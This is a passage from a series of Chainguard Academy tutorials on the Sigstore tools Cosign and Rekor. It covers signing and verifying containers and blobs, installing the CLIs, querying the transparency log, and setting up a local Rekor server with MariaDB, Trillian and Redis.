LogID: c0d23d6ad406973f9559f3ba2d1ca01f84147d8ffc5b8445c224f98b9591801d Index: 100 IntegratedTime: 2021-01-19T19:38:52Z UUID: 2343d145e62b1051b6a2a54582b69a821b13f31054539660a020963bac0b33dc Body: { "RekordObj": { "data": { "hash": { "algorithm": "sha256", "value": "bf9f7899c65cc4decf96658762c84015878e5e2e41171bdb39e6ac39b4d6b797" } }, "signature": { "content": "LS0tL…S0=", "format": "pgp", "publicKey": { "content": "LS…0tLS0=" } } } } The RekordObj is indicated inside the body field, and is one of the standard formats used by Rekor to indicate a digital signature of an object. The signature in this entry was generated via PGP, a traditional method of creating digital signatures, sometimes also used to sign code artifacts. Many other digital signature types are accepted. The signature block contains content fields that are base64-encoded, a form of encoding that enables reliably sending binary data over networks. There are a number of different formats stored in the Rekor log, each associated with a particular type of artifact and use case. Users of Rekor also have an offline method for determining whether a particular entry exists in a Rekor log by leveraging inclusion proofs, which are enabled through Merkle trees. Merkle trees are a data structure that enable a party to use cryptographic hash functions — a way of mapping potentially large values to relatively short digests — to prove that a piece of data is contained within a much larger data structure. This proof is accomplished by providing a series of hashes to the user, hashes that if recombined prove to the user that an entry is indeed in the Rekor log. Sigstore users can “staple” such an inclusion proof to an artifact, attaching the inclusion proof next to an artifact in a repository, and therefore proving that the artifact is indeed included in Rekor. For a detailed description of Merkle trees and inclusion proofs, refer to the “helpful resources” section at the end of this chapter. Setting up an internal Rekor instance Your organization can also set up its own instance of Rekor, or you can individually set up a Rekor server to more fully understand it. You can deploy the Rekor server through Project Sigstore’s Docker Compose file, through a Kubernetes operator, with a Helm chart, or you can build a Rekor server yourself. In order to build a Rekor server, you will need Go, a MySQL-compatible database, and you will need to build Trillian, an append-only log. In the lab section, we will walk through how to set up a Rekor server locally. --- ### An Introduction to Cosign URL: https://edu.chainguard.dev/open-source/sigstore/cosign/an-introduction-to-cosign/ Last Modified: July 29, 2024 Tags: Cosign, Overview An earlier version of this material was published in the Cosign chapter of the Linux Foundation Sigstore course. Cosign supports software artifact signing, verification, and storage in an OCI (Open Container Initiative) registry. While Cosign was developed with containers and container-related artifacts in mind, it can also be used for open source software packages and other file types. Cosign can therefore be used to sign blobs (binary large objects), files like READMEs, SBOMs (software bills of materials), Kubernetes Helm Charts, Tekton bundles (an OCI artifact containing Tekton CI/CD resources like tasks), and more. 
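For a first taste of what this looks like in practice, the container and blob workflows covered later in this material differ mainly in the subcommand used; a minimal sketch, assuming a container image and a local file you control:

```sh
# Keyless signing of a container image in a registry (walked through later)
cosign sign docker-username/demo-container

# Key-based signing of an arbitrary local file (see the blob signing tutorial)
cosign sign-blob --key cosign.key artifact
```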
By signing software, you can authenticate that you are who you say you are, which can in turn enable a trust root so that developers and consumers who leverage your software can verify that you created the software artifact that you have said you’ve created. They can also ensure that the artifact was not tampered with by a third party. As someone who may use software libraries, containers, or other artifacts as part of your development lifecycle, a signed artifact can give you greater assurance that the code or container you are incorporating is from a trusted source. Code Signing with Cosign Software artifacts are distributed widely, can be incorporated into the software of other individuals and organizations, and are often updated throughout their life spans. End users and developers who build upon existing software are increasingly aware of the possibility of threats and vulnerabilities in packages, containers, and other artifacts. How can users and developers decide whether to use software created by others? One answer that has been increasingly gaining traction is code signing. While code signing is not new technology, the growing prevalence of software in our everyday lives coupled with a rising number of attacks like SolarWinds and Codecov has created a more pressing need for solutions that build trust, prevent forgery and tampering, and ultimately lead to a more secure software supply chain. Similar in concept to a signature on a document that was signed in the presence of a notary or other professional who can certify your identity, a signature on a software artifact attests that you are who you say you are and that the code was not altered after signing. Instead of a recognized notary when you sign software, it is a recognized certificate authority (CA) that validates your identity. These checks that go through recognized bodies able to establish a developer’s identity support the root of trust that security relies on so that bad actors cannot compromise software. Code signing involves a developer, software publisher, or entity (like an automated workload) digitally signing a software artifact to confirm their identity and ensure that the artifact was not tampered with since having been signed. Code signing has several implementations, and Cosign is one such implementation, but all code signing technology follows a similar process as Cosign. The recommended practice for a developer (or organization) looking to sign their code with Cosign is to use keyless signing. This process will first generate an ephemeral key pair which will then be used to create a digital signature for a given software artifact. A key pair is a combination of a signing key to sign data, and a verification key that is used to verify data signed with the corresponding signing key. With the cosign sign command, the developer will sign their software artifact, and that signature will be stored in the registry (if applicable). This signature can later be verified by others through searching for an artifact, finding its signature, and then verifying it. Keyless Signing Code signing is a solution for many use cases related to attestation and verification with the goal of a more secure software supply chain. While key pairs are a technology standard that have a long history in technology (SSH keys, for instance), they create their own challenges for developers and engineering teams. The contents of a public key are very opaque; humans cannot readily discern who the owner of a given key is. 
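To see why identity is hard to read off of a key, note that the public half of a Cosign key pair (generated with cosign generate-key-pair, shown later in this chapter) is just a short PEM-encoded key with no name or email attached; an illustrative, truncated example:

```sh
cat cosign.pub
# -----BEGIN PUBLIC KEY-----
# MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQc...
# -----END PUBLIC KEY-----
```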
Traditional public key infrastructure, or PKI, has done the work to create, manage, and distribute public-key encryption and digital certificates. A new form of PKI is keyless signing, which prevents the challenges of long-lived and opaque signing keys. In keyless signing, short-lived certificates are generated and linked into the chain of trust through completing an identity challenge that confirms the identity of the signer. Because these keys persist only long enough for signing to take place, signature verification ensures that the certificate was valid at the time of signing. Policy enforcement is supported through an encoding of the identity information onto the certificate, allowing others to verify the identity of the developer who signed. Through offering short-lived credentials, keyless signing can support the recommended practice of operating your build environment like a production environment. This prevents the opportunity for long-lived keys to be stolen and used to sign malicious artifacts. Even if these short-lived keys used in keyless signing were stolen, they’d be useless! While keyless signing can be used by individuals in the same manner as long-lived key pairs, it is also well suited for continuous integration and continuous deployment workloads. Keyless signing works by sending an OpenID Connect (OIDC) token to a certificate authority like Fulcio to be signed by a workload’s authenticated OIDC identity. This allows the developer to cryptographically demonstrate that the software artifact was built by the continuous integration pipeline of a given repository, for example. Cosign uses ephemeral keys and certificates, gets them signed automatically by the Fulcio root certificate authority, and stores these signatures in the Rekor transparency log, which automatically provides an attestation at the time of creation. You can manually create a keyless signature with the following cosign command. In our example, we’ll use Docker Hub to store the signature. If you would like to follow along, ensure you are logged into Docker Hub on your local machine and that you have a Docker repository with an image available. The following example assumes a username of docker-username and a repository name of demo-container. cosign sign docker-username/demo-container You’ll be taken through a workflow that requests you to grant permission to have your information stored permanently in transparency logs, and moves to a workflow with an OIDC provider. Generating ephemeral keys... Retrieving signed certificate... Note that there may be personally identifiable information associated with this signed artifact. This may include the email address associated with the account with which you authenticate. This information will be used for signing this artifact and will be stored in public transparency logs and cannot be removed later. By typing 'y', you attest that you grant (or have permission to grant) and agree to have this information stored permanently in transparency logs. Are you sure you would like to continue? [y/N] Your browser will now be opened to: ... At this point, a browser window will open and you will be directed to a page that asks you to log in to Sigstore. You can authenticate with GitHub, Google, or Microsoft. Note that the email address that is tied to these credentials will be permanently visible in the Rekor transparency log. This makes it publicly visible that you are the one who signed the given artifact, and helps others trust the given artifact. 
That said, it is worth keeping this in mind when choosing your authentication method. Once you log in and are authenticated, you’ll receive feedback of “Sigstore Authentication Successful!”, and you may now safely close the window. On the terminal, you’ll receive output that you were successfully verified, and you’ll get confirmation that the signature was pushed. Successfully verified SCT... tlog entry created with index: Pushing signature to: index.docker.io/docker-username/demo-container If you followed along with Docker Hub, you can check the user interface of your repository and verify that you pushed a signature. You can then further verify that the keyless signature was successful by using cosign verify to check. You will need to know some information in order to verify the entry. You’ll need to use the identity flags --certificate-identity which corresponds to the email address of the signer, and --certificate-oidc-issuer which corresponds to the OIDC provider that the signer used. For example, a Gmail account using Google as the OIDC issuer, will be able to be verified with the following command. cosign verify \ --certificate-identity username@gmail.com \ --certificate-oidc-issuer https://accounts.google.com \ docker-username/demo-container Verification for index.docker.io/docker-username/demo-container:latest -- The following checks were performed on each of these signatures: - The cosign claims were validated - Existence of the claims in the transparency log was verified offline - The code-signing certificate was verified using trusted certificate authority certificates [{"critical":{"identity":{"docker-reference":"index.docker.io/docker-username/demo-container"},"image":{"docker-manifest-digest":"sha256:e..."},"type":"cosign container image signature"},"optional":{"1.3.6.1.4.1.57264.1.1":"https://accounts.google.com","Bundle":{"SignedEntryTimestamp":"...","Payload":{"body":"eyJhcGlWZX...X19","integratedTime":...,"logIndex":...,"logID":"..."}},"Issuer":"https://accounts.google.com","Subject":"username@gmail.com"}}] As part of the JSON output, you should get feedback on the issuer that you used and the email address associated with it. For example, if you used Google as your OIDC provider, you will have "Issuer":"https://accounts.google.com","Subject":"username@gmail.com"}}] as the last part of your output. Cosign with Keys You can also use Cosign with long-lived key pairs. If you would like to follow along, please first install Cosign. cosign generate-key-pair Enter password for private key: Enter again: Private key written to cosign.key Public key written to cosign.pub You can sign a container and store the signature in the registry with the cosign sign command. cosign sign --key cosign.key docker-username/demo-container Enter password for private key: Pushing signature to: index.docker.io/sigstore-course/demo:sha256-87ef60f558bad79beea6425a3b28989f01dd417164150ab3baab98dcbf04def8.sig Finally, you can verify a software artifact against a public key with the cosign verify command. This command will return 0 if at least one Cosign formatted signature for the given artifact is found that matches the public key. Any valid formats are printed to standard output in a JSON format. 
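Because cosign verify exits with a non-zero status when no matching signature is found, the command is easy to gate a script or CI step on. A minimal sketch, reusing the cosign.pub key and demo image from this section:

```sh
# Abort the script if verification fails; otherwise keep the JSON output for later inspection
set -e
cosign verify --key cosign.pub docker-username/demo-container > verification.json
echo "Signature verified; details saved to verification.json"
```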
cosign verify --key cosign.pub docker-username/demo-container The following checks were performed on these signatures: - The cosign claims were validated - The signatures were verified against the specified public key {"Critical":{"Identity":{"docker-reference":""},"Image":{"Docker-manifest-digest":"sha256:87ef60f558bad79beea6425a3b28989f01dd417164150ab3baab98dcbf04def8"},"Type":"cosign container image signature"},"Optional":null} You should now have some familiarity with the process of signing and verifying code in Cosign. For a more thorough tutorial, please review How to Sign a Container with Cosign. Code signing provides developers and others who release code a way to attest to their identity, and in turn, those who are consumers (whether end users or developers who incorporate existing code) can verify those signatures to ensure that the code is originating from where it is said to have originated, and check that that particular developer (or vendor) is trusted. --- ### How to Install the Rekor CLI URL: https://edu.chainguard.dev/open-source/sigstore/rekor/how-to-install-rekor/ Last Modified: August 20, 2022 Tags: Rekor, Procedural An earlier version of this material was published in the Rekor chapter of the Linux Foundation Sigstore course. Follow this tutorial for an overview of how to install rekor-cli. To install the Rekor command line interface (rekor-cli) with Go, you will need Go version 1.16 or greater. For Go installation instructions, see the official Go documentation. If you have Go installed already, you can check your Go version via this command. go version If Go is installed, you’ll receive output similar to the following. go version go1.13.8 linux/amd64 You will also need to set your $GOPATH, the location of your Go workspace. export GOPATH=$(go env GOPATH) You can then install rekor-cli: go install -v github.com/sigstore/rekor/cmd/rekor-cli@latest Check that the installation of rekor-cli was successful using the following command: rekor-cli version You should receive output similar to that of below: GitVersion: v0.4.0-59-g2025bf8 GitCommit: 2025bf8aa50b368fc3972bb276dfeae8b604d435 GitTreeState: clean BuildDate: '2022-01-26T00:20:33Z' GoVersion: go1.17.6 Compiler: gc Platform: darwin/arm64 Now that you have the Rekor CLI tool successfully installed, you can start working with it. --- ### How to Install Cosign URL: https://edu.chainguard.dev/open-source/sigstore/cosign/how-to-install-cosign/ Last Modified: December 16, 2024 Tags: Cosign, Procedural An earlier version of this material was published in the Cosign chapter of the Linux Foundation Sigstore course. Cosign supports software artifact signing, verification, and storage in an OCI (Open Container Initiative) registry. By signing software, you can authenticate that you are who you say you are, which can in turn enable a trust root so that developers and consumers who leverage your software can verify that you created the software artifact that you have said you’ve created. They can also ensure that that artifact was not tampered with by a third party. As someone who may use software libraries, containers, or other artifacts as part of your development lifecycle, a signed artifact can give you greater assurance that the code or container you are incorporating is from a trusted source. There are a few different ways to install Cosign to your local machine or remote server. The approach you choose should be based on the way you set up packages, the tooling that you use, or the way that your organization recommends. 
We will go through several options. Please refer to the official Cosign installation documentation for additional context and updates. Installing Cosign with Homebrew or Linuxbrew Those who are running macOS locally may be familiar with Homebrew as a package manager. There is also a Linuxbrew version for those running a Linux distribution. If you are using macOS and would like to leverage a package manager, you can review the official documentation to install Homebrew to your machine. To install Cosign with Homebrew, run the following command. brew install cosign To update Cosign in the future, you can run brew upgrade cosign to get the newest version. Installing Cosign with Linux Package Managers Cosign is supported by the Arch Linux, Alpine Linux, and Nix package managers. On the releases page, you’ll also find .deb and .rpm packages for manual download and installation. To install Cosign on Arch Linux, use the pacman package manager. pacman -S cosign If you are using Alpine Linux or an Alpine Linux image, you can add Cosign with apk. apk add cosign If you use the Nix package manager, you can install Cosign with the following command: nix-env -iA nixpkgs.cosign And on NixOS, you can install Cosign using the nixos.cosign attribute with the nix-env package manager. nix-env -iA nixos.cosign For Ubuntu and Debian distributions, check the releases page and download the latest .deb package. At the time of this writing, this would be version 2.5.0. To install the .deb file, run: sudo dpkg -i ~/Downloads/cosign_2.5.0_amd64.deb For CentOS and Fedora, download the latest .rpm package from the releases page and install Cosign with: rpm -ivh cosign-2.5.0-1.x86_64.rpm You can check to ensure that Cosign is successfully installed using the cosign version command following installation. When you run the command, you should receive output that indicates the version you have installed. Installing Cosign with Go You can install Cosign using the Go package manager. Installing with Go will work across different operating systems and distributions. First, check that you have Go installed on your machine, and ensure that it is Go version 1.22.7 or later. go version go version go1.23.4 linux/amd64 If you run into an error or don’t receive output like the above, you’ll need to install Go in order to install Cosign with Go. Navigate to the official Go website in order to download the appropriate version of Go for your machine. With Go installed, you are ready to install Cosign using the following command. go install github.com/sigstore/cosign/v2/cmd/cosign@latest The resulting binary from this installation will be placed at $GOPATH/bin/cosign. Installing a Cosign release with Go You can install Cosign with Go directly from the Cosign GitHub releases page. At the time of writing, the newest release is v2.5.0. You can download this version with the following command. go install github.com/sigstore/cosign/v2/cmd/cosign@v2.5.0 The resulting binary from this installation will be placed at $GOPATH/bin/cosign. Check the Cosign GitHub releases page for additional releases. Installing Cosign with the Cosign Binary Installing Cosign via its binary offers you greater control over your installation, but this method also requires you to manage your installation yourself. In order to install via binary, check for the most updated version in the open source GitHub repository for Cosign under the releases page. You can use the wget command to download the most recent binary. In our example, the release we are installing is 2.5.0.
wget "https://github.com/sigstore/cosign/releases/download/v2.5.0/cosign-linux-amd64" Next, move the Cosign binary to your bin folder. sudo mv cosign-linux-amd64 /usr/local/bin/cosign Finally, update permissions so that Cosign can execute within your filesystem. sudo chmod +x /usr/local/bin/cosign You’ll need to ensure that you keep Cosign up to date if you install via binary. You can always later opt to use a package manager to update Cosign in the future. --- ### How to Query Rekor URL: https://edu.chainguard.dev/open-source/sigstore/rekor/how-to-query-rekor/ Last Modified: August 20, 2022 Tags: Rekor, Procedural An earlier version of this material was published in the Rekor chapter of the Linux Foundation Sigstore course. Rekor is the transparency log of Sigstore, which stores records of artifact metadata. Before querying Rekor, you should have the rekor-cli installed, which you can achieve by following the “How to Install the Rekor CLI” tutorial. In order to access the data stored in Rekor, the rekor-cli requires either the log index of an entry or the UUID of a software artifact. For instance, to retrieve entry number 100 from the public log, use this command: rekor-cli get --rekor_server https://rekor.sigstore.dev --log-index 100 An abridged version of the output is below: LogID: c0d23d6ad406973f9559f3ba2d1ca01f84147d8ffc5b8445c224f98b9591801d Index: 100 IntegratedTime: 2021-01-19T19:38:52Z UUID: 2343d145e62b1051b6a2a54582b69a821b13f31054539660a020963bac0b33dc Body: { "RekordObj": { "data": { "hash": { "algorithm": "sha256", "value": "bf9f7899c65cc4decf96658762c84015878e5e2e41171bdb39e6ac39b4d6b797" } }, "signature": { "content": "LS0tL…S0=", "format": "pgp", "publicKey": { "content": "LS…0tLS0=" } } } } The next command will produce the same output but uses the UUID to retrieve the artifact: rekor-cli get --uuid 2343d145e62b1051b6a2a54582b69a821b13f31054539660a020963bac0b33dc It is also possible to use a web API to return results that are similar to those above. For instance, we can use curl to fetch the same artifact by its UUID with the following query: curl -X GET "https://rekor.sigstore.dev/api/v1/log/entries/2343d145e62b1051b6a2a54582b69a821b13f31054539660a020963bac0b33dc" By appending the UUID value returned by the rekor-cli get command that we ran before, we can obtain detailed information about a specific artifact that has been previously registered within the Rekor public instance. --- ### How to Sign a Container with Cosign URL: https://edu.chainguard.dev/open-source/sigstore/cosign/how-to-sign-a-container-with-cosign/ Last Modified: July 29, 2024 Tags: Cosign, Procedural An earlier version of this material was published in the Cosign chapter of the Linux Foundation Sigstore course. Cosign is a tool you can use to sign software artifacts, which in turn allows you to verify that you are who you say you are, and instills trust across the software ecosystem. Signing software also allows people to understand the provenance of the software, and prevents tampering. Let’s step through signing a container with Cosign. We are using a container to provide a sense of how you may use Sigstore with containerized workloads, but the steps we are taking to sign a container are very similar to the steps that we would take to sign any other software artifact that can be published in a container registry, and we will discuss signing blobs a little later. 
Prerequisites Before beginning this section, ensure that you have Docker installed and that you are running Docker Desktop if that is relevant for your operating system. For guidance on installing and using Docker, refer to the official Docker documentation. In order to push to the Docker container registry, you will need a Docker Hub account. If you are familiar with using a different container registry, feel free to use that. Additionally, you will need Cosign installed, which you can achieve by following our How to Install Cosign guide. Creating a Container You’ll now be creating a new container. Create a new directory within your user directory that is the same as your Docker username and, within that, a directory called hello-container. If you will be opting to use a registry other than Docker, feel free to use the relevant username for that registry. mkdir -p ~/docker-username/hello-container Move into the directory. cd ~/docker-username/hello-container Let’s create the Dockerfile that describes the container. This will be essentially a “Hello, World” container for demonstration purposes. Use the text editor of your choice to create the Dockerfile. You can use Visual Studio Code or a command line text editor like nano. Just ensure that the file is named exactly Dockerfile, with a capital D and no extension. nano Dockerfile Type the following into your editor:

FROM alpine
CMD ["echo", "Hello, Cosign!"]

This file instructs the container to use the Alpine Linux distribution, which is lightweight and secure. Then, it prints a “Hello, Cosign!” message onto the command-line interface. Once you are satisfied that your Dockerfile is the same as the text above, you can save and close the file. Now you are ready to build the container. Building and Running a Container Within the same hello-container directory, you can build the container. You should use the format docker-username/image-name to tag your image, since you’ll be publishing it to a registry. docker build -t docker-username/hello-container . If you receive an error message or a “failed” message, check that your user is part of the docker group and that you have the right permissions to run Docker. For testing, you may also try to run the above command with sudo. If there are no errors, the output will indicate that your build was successful. => => naming to docker.io/docker-username/hello-container At this point your container is built and you can verify that the container is working as expected by running the container. docker run docker-username/hello-container You should receive the expected output of the echo message you added to the Dockerfile. Hello, Cosign! You can further confirm that the Docker container is among your listed containers by listing all of your containers. docker ps -a CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES c828db494203 hello-container "echo 'Hello, Cosign…" 13 seconds ago Exited (0) 9 seconds ago confident_lamarr Your output will be similar to the above, but the timestamps and name will be different. Now that you have built your container and are satisfied that it is working as expected, you can publish and sign your container. Publishing a Container to a Registry We will be publishing our container to the Docker registry. If you are opting to use a different registry, your steps will be similar. At this point, you can access the Docker container registry at hub.docker.com and create a new repository under your username called hello-container.
We will be making this public, but you can make it private if you prefer. If you are happy for it to be public, you can skip this step as the repository will be created when pushing the container. In any case, you can delete this once you are satisfied that you have signed the container. Once this is set up, you can push the container you created to the Docker Hub repository. docker push docker-username/hello-container You should now be able to access your published container via your Docker Hub account. Once you ensure that it is there, you are ready to push a signature to the container. Signing a Container and Pushing the Signature to a Registry Now that the container is in a registry (in our example, it is in Docker Hub), you are ready to sign the container and push that signature to the registry. You will reference your registry username and container name in the following cosign command. Note that we are signing the image in Docker Hub keylessly with Cosign. cosign sign docker-username/hello-container You will be asked to verify that you agree with having your information in the transparency log and will be taken through an OIDC workflow. Generating ephemeral keys... Retrieving signed certificate... Note that there may be personally identifiable information associated with this signed artifact. This may include the email address associated with the account with which you authenticate. This information will be used for signing this artifact and will be stored in public transparency logs and cannot be removed later. By typing 'y', you attest that you grant (or have permission to grant) and agree to have this information stored permanently in transparency logs. Are you sure you would like to continue? [y/N] Your browser will now be opened to: ... You’ll receive output indicating that the signature was pushed to the container registry. Successfully verified SCT... tlog entry created with index: Pushing signature to: index.docker.io/docker-username/hello-container In the case of Docker Hub, on the web interface there should be a SHA (secure hash algorithm) added to the tag, enabling you to confirm that your pushed signature was registered. We’ll now manually verify the signature with Cosign. Verify a Container’s Signature We’ll be demonstrating this on the container we just pushed to a registry, but you can also verify a signature on any other signed container using the same steps. While you will more likely be verifying signatures in workloads versus manually, it is still helpful to understand how everything works and is formatted. Let’s use Cosign to verify that the signature exists on the transparency log and matches our expected information. You will need to know some information in order to verify the entry. You’ll need to use the identity flags --certificate-identity, which corresponds to the email address of the signer, and --certificate-oidc-issuer, which corresponds to the OIDC provider that the signer used. For example, a signature made with a Gmail account using Google as the OIDC issuer can be verified with the following command. cosign verify \ --certificate-identity username@gmail.com \ --certificate-oidc-issuer https://accounts.google.com \ docker-username/hello-container Here, rather than passing a public key, we are passing the signer’s identity and OIDC issuer to the cosign verify command, since the image was signed keylessly. You should receive output indicating that the Cosign claims were validated.
Verification for index.docker.io/docker-username/hello-container:latest -- The following checks were performed on each of these signatures: - The cosign claims were validated - The signatures were verified against the specified public key [{"critical":{"identity":{"docker-reference":"index.docker.io/docker-username/hello-container"},"image":{"docker-manifest-digest":"sha256:690ecfd885f008330a66d08be13dc6c115a439e1cc935c04d181d7116e198f9c"},"type":"cosign container image signature"},"optional":null}] The full output is in JSON format and includes the digest of the container image, which is how we can be sure these detached signatures cover the correct image. --- ### How to Sign and Upload Metadata to Rekor URL: https://edu.chainguard.dev/open-source/sigstore/rekor/how-to-sign-and-upload-metadata-to-rekor/ Last Modified: August 20, 2022 Tags: Rekor, Procedural An earlier version of this material was published in the Rekor chapter of the Linux Foundation Sigstore course. This tutorial will walk you through signing and uploading metadata to the Rekor transparency log, which is a project of Sigstore. In order to follow along, you’ll need the rekor-cli installed, which you can accomplish by following the “How to Install the Rekor CLI” tutorial. We will use SSH to sign a text document. SSH is often used to communicate securely over an unsecured network and can also be used to generate public and private keys appropriate for signing an artifact. First, generate a key pair. This command will generate a public key and a private key file. You’ll be able to easily identify the public key because it uses the .pub extension. The command below will create new key files named id_ed25519 and id_ed25519.pub in your current directory, but you may want to call them something else; you can do that by passing a different filename after the -f flag. ssh-keygen -t ed25519 -f id_ed25519 Then, create a text file called README.txt with your favorite text editor. You can enter as little or as much text in that file as you would like. For example, we can use nano: nano README.txt Then, within the file, we can type some text, such as the following. Hello, Rekor! Save and close the file. Next, sign this file with the following command. This command produces a signature file ending in the .sig extension. ssh-keygen -Y sign -n file -f id_ed25519 README.txt You should receive the following output. Signing file README.txt Write signature to README.txt.sig Then, upload this artifact to the public instance of the Rekor log. rekor-cli upload --artifact README.txt --signature README.txt.sig --pki-format=ssh --public-key=id_ed25519.pub The returned value will include a string similar to: https://rekor.sigstore.dev/api/v1/log/entries/83140d699ebc33dc84b702d2f95b209dc71f47a3dce5cce19a197a401852ee97 Save the UUID returned after using this command. In this example, the UUID is 83140d699ebc33dc84b702d2f95b209dc71f47a3dce5cce19a197a401852ee97. Now you can query Rekor for your recently saved entry. Run the following command, replacing UUID with the UUID obtained from the previous command. rekor-cli get --uuid UUID Once you receive output formatted as JSON with details on the signature, you will know you have successfully stored a signed metadata entry in Rekor.
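If you would also like to confirm that the artifact and signature check out against the log without looking the entry up by UUID, rekor-cli includes a verify subcommand that accepts the same artifact, signature, and public key flags as the upload command; a sketch under those assumptions:

```sh
rekor-cli verify --artifact README.txt --signature README.txt.sig \
  --pki-format=ssh --public-key=id_ed25519.pub
```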
--- ### How to Sign Blobs and Standard Files with Cosign URL: https://edu.chainguard.dev/open-source/sigstore/cosign/how-to-sign-blobs-with-cosign/ Last Modified: July 29, 2024 Tags: Cosign, Procedural An earlier version of this material was published in the Cosign chapter of the Linux Foundation Sigstore course. Cosign can sign more than just containers. Blobs, or binary large objects, and standard files can be signed in a similar way. You can publish a blob or other artifact to an OCI (Open Container Initiative) registry with Cosign. This tutorial assumes you have a Cosign key pair set up, which you can achieve by following our Introduction to Cosign guide. Navigate to the directory which contains your cosign.pub and cosign.key key pair as generated in the Introduction to Cosign guide. We’ll create an artifact (in this case, a standard file that contains text). We’ll call the file artifact and fill it with the “hello, cosign” text. echo "hello, cosign" > artifact Cosign offers support for signing blobs with the cosign sign-blob and cosign verify-blob commands. To sign our file, we’ll pass our signing key and the name of our file to the cosign sign-blob command. cosign sign-blob --key cosign.key artifact You’ll get output similar to the following, and a prompt to enter your password for your signing key. Using payload from: artifact Enter password for private key: With your password entered, you’ll receive your signature output. MEUCIAb9Jxbbk9w8QF4/m5ADd+AvvT6pm/gp0HE6RMPp3SfOAiEAsWnpkaVZanjhQDyk5b0UPnlsMhodCcvYaGl1sj9exJI= You will need this signature output to verify the artifact signature. Use the cosign verify-blob command and pass in the public key, the signature, and the name of your file. cosign verify-blob --key cosign.pub --signature MEUCIAb9Jxbbk9w8QF4/m5ADd+AvvT6pm/gp0HE6RMPp3SfOAiEAsWnpkaVZanjhQDyk5b0UPnlsMhodCcvYaGl1sj9exJI= artifact Note that the entire signature output needs to be passed to this command. You’ll get feedback that the blob’s signature was verified. Verified OK You can also publish the artifact to a container registry such as Docker Hub and sign the artifact’s generated image with Cosign. Running this command will create a new repository in your Docker Hub account. We will call this one artifact, but you can use an alternative name that is meaningful to you. cosign upload blob -f artifact docker-username/artifact You’ll receive feedback that the file was uploaded, and the output will already include the artifact’s SHA digest. Uploading file from [artifact] to [index.docker.io/docker-username/artifact:latest] with media type [text/plain] File [artifact] is available directly at [index.docker.io/v2/docker-username/artifact/blobs/sha256:dcf8ff… Uploaded image to: index.docker.io/docker-username/artifact@sha256:d10846… Being able to sign blobs provides you with the opportunity to sign README files and scripts rather than just containers. This can ensure that every piece of a software project is accounted for through signatures and provenance. --- ### How to Set Up a Rekor Instance Locally URL: https://edu.chainguard.dev/open-source/sigstore/rekor/install-a-rekor-instance/ Last Modified: August 20, 2022 Tags: Rekor, Procedural An earlier version of this material was published in the Rekor chapter of the Linux Foundation Sigstore course. While individual developers may not generally need to set up their own instance of Rekor, it may be worthwhile to set up your own local instance in order to further understand how Rekor works under the hood.
We will have multiple terminal sessions running to set up the Rekor server. You may want to use a tool such as tmux to keep terminal sessions running in the background within the same window. Create and run a database backend To start, we’ll need to create a database backend; while Sigstore accepts several different databases, we’ll work with MariaDB here, so make sure you have it installed. If you are on Debian or Ubuntu, you can install it with the following command. sudo apt install -y mariadb-server If you are on macOS, you can install it with Homebrew. If you don’t already have Homebrew installed, visit brew.sh to set it up. brew install mariadb If you’re using another operating system, review the official MariaDB installation documentation. With MariaDB installed, start the database. For Debian or Ubuntu, you can run: sudo mysql_secure_installation For macOS, you can run: brew services start mariadb && sudo mysql_secure_installation Once you run the above command, you will be prompted to enter your system password, and then will receive a number of prompts as terminal output. You can answer “no” or N to the first question on changing the root password, and “yes” or Y to the remaining prompts. Switch to unix_socket authentication [Y/n] n … Change the root password? [Y/n] n … Remove anonymous users? [Y/n] Y … Disallow root login remotely? [Y/n] Y … Remove test database and access to it? [Y/n] Y … Thanks for using MariaDB! Once you receive the Thanks for using MariaDB! output, you’re ready to create your database. We’ll create a directory to store our work in this example, feel free to create a directory or move into a directory that is meaningful for you. mkdir lf-sigstore && cd $_ From this directory, we’ll clone the Rekor GitHub repository. git clone https://github.com/sigstore/rekor.git Now, move into the directory of Rekor where the database creation script is held. cd $HOME/lf-sigstore/rekor/scripts From here, you can run the database creation script. sudo sh -x createdb.sh You should receive output that indicates that the test database and user were created. + DB=test + USER=test + PASS=zaphod + ROOTPASS= + echo -e 'Creating test database and test user account' -e Creating test database and test user account + mysql + echo -e 'Loading table data..' -e Loading table data.. + mysql -u test -pzaphod -D test At this point, we are ready to move onto installing Trillian. Install and set up Trillian Trillian offers a transparent, append-only, and cryptographically verifiable data store. Trillian will store its records in the MariaDB database we just created. We can install Trillian with Go. go install github.com/google/trillian/cmd/trillian_log_server@latest go install github.com/google/trillian/cmd/trillian_log_signer@latest go install github.com/google/trillian/cmd/createtree@latest We’ll start the Trillian log server, providing the API used by Rekor and the Certificate Transparency frontend. $(go env GOPATH)/bin/trillian_log_server --logtostderr \ -http_endpoint=localhost:8090 -rpc_endpoint=localhost:8091 Your output will indicate that the server has started, and the session will hang. 
I0629 18:11:27.222341 7395 quota_provider.go:46] Using MySQL QuotaManager I0629 18:11:27.222847 7395 main.go:141] HTTP server starting on localhost:8090 I0629 18:11:27.222851 7395 main.go:180] RPC server starting on localhost:8091 I0629 18:11:27.223757 7395 main.go:188] Deleted tree GC started Next, let’s start the log signer in a new terminal session (while keeping the previous session running), which will sequence data into cryptographically verifiable Merkle trees and periodically check the database. $(go env GOPATH)/bin/trillian_log_signer --logtostderr --force_master --http_endpoint=localhost:8190 -rpc_endpoint=localhost:8191 You’ll receive output that indicates that the log signer has started. This session will also hang. I0629 18:13:42.226319 8513 main.go:98] **** Log Signer Starting **** W0629 18:13:42.227281 8513 main.go:129] **** Acting as master for all logs **** … The Trillian system can support multiple independent Merkle trees. We’ll have Trillian send a request to create a tree and save the log ID for future use. Run the following command in a third terminal session (while keeping the previous two sessions running). $(go env GOPATH)/bin/createtree --admin_server localhost:8091 \ | tee $HOME/lf-sigstore/trillian.log_id In the Trillian log server terminal, you should have output similar to the following: Acting as master for 2 / 2 active logs: master for: <log-2703303398771250657> <log-5836066877012007666> This log string will match the string output of the new terminal session. Trillian uses the gRPC API for requests, which is an open source Remote Procedure Call (RPC) framework that can run in any environment. We can now move onto the Rekor server. Install and set up Redis Rekor server also requires a Redis instance. If you are on Debian or Ubuntu, you can install it with the following command. sudo apt install -y redis-server If you are on macOS, you can install it with Homebrew. If you don’t already have Homebrew installed, visit brew.sh to set it up. brew install redis If you’re using another operating system, review the official Redis documentation. With Redis installed, start it. For Debian or Ubuntu, you can run: sudo systemctl start redis-server For macOS, you can run: brew services start redis Now you can proceed to the next step, where you will install the Rekor server itself. Install Rekor server Rekor provides a restful API-based server with a transparency log that allows for validating and storing. Let’s move into the main rekor/ directory we set up. cd $HOME/lf-sigstore/rekor Now we’ll install the Rekor server from source with Go. 